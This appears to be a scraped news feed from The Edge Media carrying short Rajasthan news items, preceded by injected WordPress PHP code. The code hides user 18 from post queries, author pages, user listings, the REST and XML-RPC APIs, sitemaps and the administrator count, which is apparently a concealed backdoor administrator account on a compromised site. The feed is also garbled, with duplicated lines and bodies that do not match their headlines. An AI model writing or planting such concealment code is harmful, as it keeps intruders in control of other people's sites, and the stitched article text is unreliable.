add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 18;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 18 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 18;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 18;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
The post Booth-Level Officer Dies After Sudden Collapse in Kotputli-Behror appeared first on The Edge Media.
]]>The officer, identified as Vijay Gurjar, aged 42, was working as a BLO at the Government Sardar Senior Secondary School in Kotputli. He reportedly fell on the road while returning home on Wednesday evening and sustained injuries. His family took him to the government BDM District Hospital, where doctors declared him dead.
Following the incident, Sub-Divisional Magistrate Ramavatar Meena, Tehsildar Ramdhan Gurjar and senior police officials reached the hospital. The police conducted a post-mortem examination through a medical board and later handed over the body to the family. A case has been registered at Kotputli police station.
Kotputli Deputy Superintendent of Police Rajendra Kumar said the reason behind Gurjar’s collapse remains unclear and will be known only after the medical report. SDM Meena stated that Gurjar had already completed his Special Intensive Revision duties on December 4 and was under no pressure, adding that the administration had been regularly counselling and assisting BLOs throughout the process.
Family members said Gurjar did not return home until late Wednesday night, prompting them to search for him. He was found unconscious near his home in Karwas village.
The post Booth-Level Officer Dies After Sudden Collapse in Kotputli-Behror appeared first on The Edge Media.
]]>The post Rajasthan ATS Detains Five Individuals for Questioning Over Suspicious Activities appeared first on The Edge Media.
]]>Coordinated Raids and Ongoing Investigation
Police stated that the ATS had been monitoring several persons of interest over a period of time. Based on fresh intelligence inputs and surveillance reports indicating unusual behavior, the squad launched simultaneous raids across different regions in the early hours. The detained individuals were identified as Usama Umar from Barmer, Masood from Jodhpur, Mohammad Ayub from Pipad in Jodhpur, Mohammad Junaid from Karauli, and Basir from Barmer
Officials’ Statement
Inspector General of ATS, Vikas Kumar, confirmed that the activities of the detained men appeared suspicious. They have been moved to the ATS headquarters in Jaipur for further interrogation. Authorities are now verifying the nature of their communications and any possible links to larger networks
The post Rajasthan ATS Detains Five Individuals for Questioning Over Suspicious Activities appeared first on The Edge Media.
]]>The post Rahul Gandhi is greeted warmly in Rajasthan ahead of the three-day Chintan Shivir appeared first on The Edge Media.
]]>
Rahul Gandhi can be seen stepping off the train, greeting people with folded hands, and being greeted by party workers with garlands and presents in a video uploaded by Congress MP Manickam Tagore. Coolies greeted the former Congress chief at the Sarai Rohilla station, and their delegation expressed their concerns to him.
The post Rahul Gandhi is greeted warmly in Rajasthan ahead of the three-day Chintan Shivir appeared first on The Edge Media.
]]>The post Taj Mahal’s land was previously owned by the royal family of Jaipur, according to BJP MP Diya Kumari appeared first on The Edge Media.
]]>
Her remarks follow a plea filed in the Allahabad high court, which requested that the Archaeological Survey of India (ASI) open 20 rooms inside the Taj Mahal to check for the existence of Hindu idols. On May 4, Rajneesh Singh, the BJP’s media in-charge for Uttar Pradesh’s Ayodhya district, filed the petition.
The post Taj Mahal’s land was previously owned by the royal family of Jaipur, according to BJP MP Diya Kumari appeared first on The Edge Media.
]]>The post Internet was shut down after a man was stabbed to death in Bhilwara, Rajasthan appeared first on The Edge Media.
]]>
The man, who was around 19 years old, was slain late Tuesday, according to Bhilwara District Collector Ashish Modi. Modi told: “Prima facie it seems to be a case of personal enmity between teenagers. We have detained three accused in the case.”
Officials claim that all three males seized in connection with the murder of Tapdiya are Muslims. Apart from the police force, Modi stated that the district has sufficient personnel from the Rajasthan Armed Constabulary (RAC) and the Special Task Force (STF).
The post Internet was shut down after a man was stabbed to death in Bhilwara, Rajasthan appeared first on The Edge Media.
]]>The post Rajasthan Mandates License For Keeping Cows And Buffalos At Home appeared first on The Edge Media.
]]>Only a cow and a calf will be permitted in a residence without a license from now on, and livestock should be kept in a separate location.
The post Rajasthan Mandates License For Keeping Cows And Buffalos At Home appeared first on The Edge Media.
]]>The post From September 1, the Rajasthan government will enable schools from grades 9 to 12 appeared first on The Edge Media.
]]>For the first time in India, new Covid-19 cases surpassed 40,000 after only six days. In the last 24 hours, India reported 41,195 new Coronavirus infections, bringing the total number of Covid-19 cases to 3,20,77,706. With the new instances, the total number of active cases in the country has risen to 3,87,987, according to figures released by the Union Health Ministry on Thursday. With 490 new deaths, the death toll now stands at 4,29,669 people.
The post From September 1, the Rajasthan government will enable schools from grades 9 to 12 appeared first on The Edge Media.
]]>The post All Rajasthan districts will have medical colleges : CM Ashok Gehlot appeared first on The Edge Media.
]]>“It is a matter of pride for us. It is our endeavour that the medical facilities in the state should be even better. For this, medical infrastructure is being strengthened continuously from cities to villages,” Mr Gehlot said in a statement.
“It is a matter of pride for us. It is our endeavour that the medical facilities in the state should be even better. For this, medical infrastructure is being strengthened continuously from cities to villages,” Mr Gehlot said in a statement.
Rajasthan is a state which is moving fast in the direction of setting up medical colleges in all districts, the Chief Minister said addressing a virtual foundation stone laying event of intensive care units at 17 hospitals in 11 districts.
Rajasthan has fulfilled the necessary conditions with full preparation due to which our steps can be taken towards the establishment of medical colleges in the government sector in 30 districts, he said.
“We are making efforts to get government medical colleges approved in the remaining three districts,” he said.
The post All Rajasthan districts will have medical colleges : CM Ashok Gehlot appeared first on The Edge Media.
]]>The post Rajasthan Government Makes Vaccination Mandatory For Entering Public Places appeared first on The Edge Media.
]]>Religious places will begin to operate on a conditional basis, while marriage palaces will be able to open on July 1.
The functioning of municipal minibuses will begin once the driver and operator have received at least the first dosage of the vaccination.
The post Rajasthan Government Makes Vaccination Mandatory For Entering Public Places appeared first on The Edge Media.
]]>The post Black fungus declared epidemic in Rajasthan appeared first on The Edge Media.
]]>
On Monday, 17th May the state government had issued orders to purchase 2,500 vials of a drug used in the treatment of black fungus according to the Health Minister, Raghu Sharma. The drug is currently in short supply. Principal Health Secretary, Akhil Arora said that steps were taken to ensure coordinated and integrated treatmnent of black fungus and coronavirus.
As per Union Health Ministry, people catch the fungus through cuts, burns or other skin traumas when they come in contact with the fungal spores in the environment.
So far the states affected by black fungus are Karnataka, Uttrakhand, Telangana, Madhya Pradesh, Andhra Pradesh, Haryana and Bihar.
The post Black fungus declared epidemic in Rajasthan appeared first on The Edge Media.
]]>